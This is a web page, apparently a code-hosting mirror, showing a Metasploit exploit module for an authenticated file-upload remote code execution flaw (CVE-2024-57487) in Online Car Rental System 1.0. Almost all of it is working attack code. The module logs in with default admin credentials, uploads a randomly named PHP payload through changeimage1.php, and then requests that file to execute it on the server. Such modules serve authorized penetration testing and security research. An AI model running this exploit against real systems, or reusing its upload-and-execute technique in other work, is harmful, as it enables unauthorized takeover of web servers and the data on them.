Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Path: blob/master/modules/exploits/multi/http/carrental_fileupload_rce.rb
Views: 18993
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::PhpEXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Car Rental System 1.0 File Upload RCE (Authenticated)',16'Description' => %q{17This module exploits an authenticated remote code execution vulnerability in the18Online Car Rental System 1.0 via the `changeimage1.php` endpoint. An authenticated19attacker can upload malicious PHP scripts without proper validation, enabling20arbitrary code execution on the server.21},22'Author' => ['Aaryan Golatkar'],23'License' => MSF_LICENSE,24'References' => [25['CVE', '2024-57487'],26['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487'],27],28'DisclosureDate' => '2025-01-13',29'Platform' => 'php',30'Arch' => ARCH_PHP,31'Privileged' => false,32'Targets' => [['Automatic', {}]],33'DefaultTarget' => 0,34'Notes' => {35'Stability' => [CRASH_SAFE],36'Reliability' => [REPEATABLE_SESSION],37'SideEffects' => [ARTIFACTS_ON_DISK]38}39)40)4142register_options(43[44OptString.new('TARGETURI', [true, 'Base path to Online Car Rental System', '/']),45OptString.new('USERNAME', [true, 'The admin username', 'admin']),46OptString.new('PASSWORD', [true, 'The admin password', 'Test@12345']),47]48)49end5051def check52res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'admin/'))53return CheckCode::Unknown('Failed to access the target.') unless res&.code == 2005455if res.body.include?('Car Rental Portal')56return CheckCode::Detected('The target appears to be the Online Car Rental System.')57end5859CheckCode::Safe('Online Car Rental System not detected')60end6162def login63print_status('Attempting to authenticate...')64res = send_request_cgi(65'uri' => normalize_uri(target_uri.path, 'admin/'),66'method' => 'POST',67'vars_post' => {68'username' => datastore['USERNAME'],69'password' => datastore['PASSWORD'],70'login' => ''71},72'keep_cookies' => true73)7475unless res&.code == 200 && res.get_cookies.include?('PHPSESSID')76fail_with(Failure::NoAccess, 'Failed to authenticate with the target.')77end7879print_good('Authentication successful.')80end8182def upload_shell83payload_name = "#{Rex::Text.rand_text_alphanumeric(5)}.php"84payload = get_write_exec_payload(unlink_self: true)8586print_status("Uploading payload as #{payload_name}...")8788post_data = Rex::MIME::Message.new89post_data.add_part(payload, 'application/x-php', nil, "form-data; name=\"img1\"; filename=\"#{payload_name}\"")90post_data.add_part('', nil, nil, 'form-data; name="update"')9192res = send_request_cgi(93'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php'),94'method' => 'POST',95'headers' => { 'Content-Type' => "multipart/form-data; boundary=#{post_data.bound}" },96'vars_get' => { imgid: '1' },97'data' => post_data.to_s98)99100fail_with(Failure::UnexpectedReply, 'Failed to upload payload.') unless res&.code == 200101102print_good('Payload uploaded successfully.')103payload_name104end105106def exploit107login108payload_name = upload_shell109payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")110111print_status("Executing payload at #{payload_url}...")112send_request_cgi(113'uri' => payload_url,114'method' => 'GET'115)116end117end118119120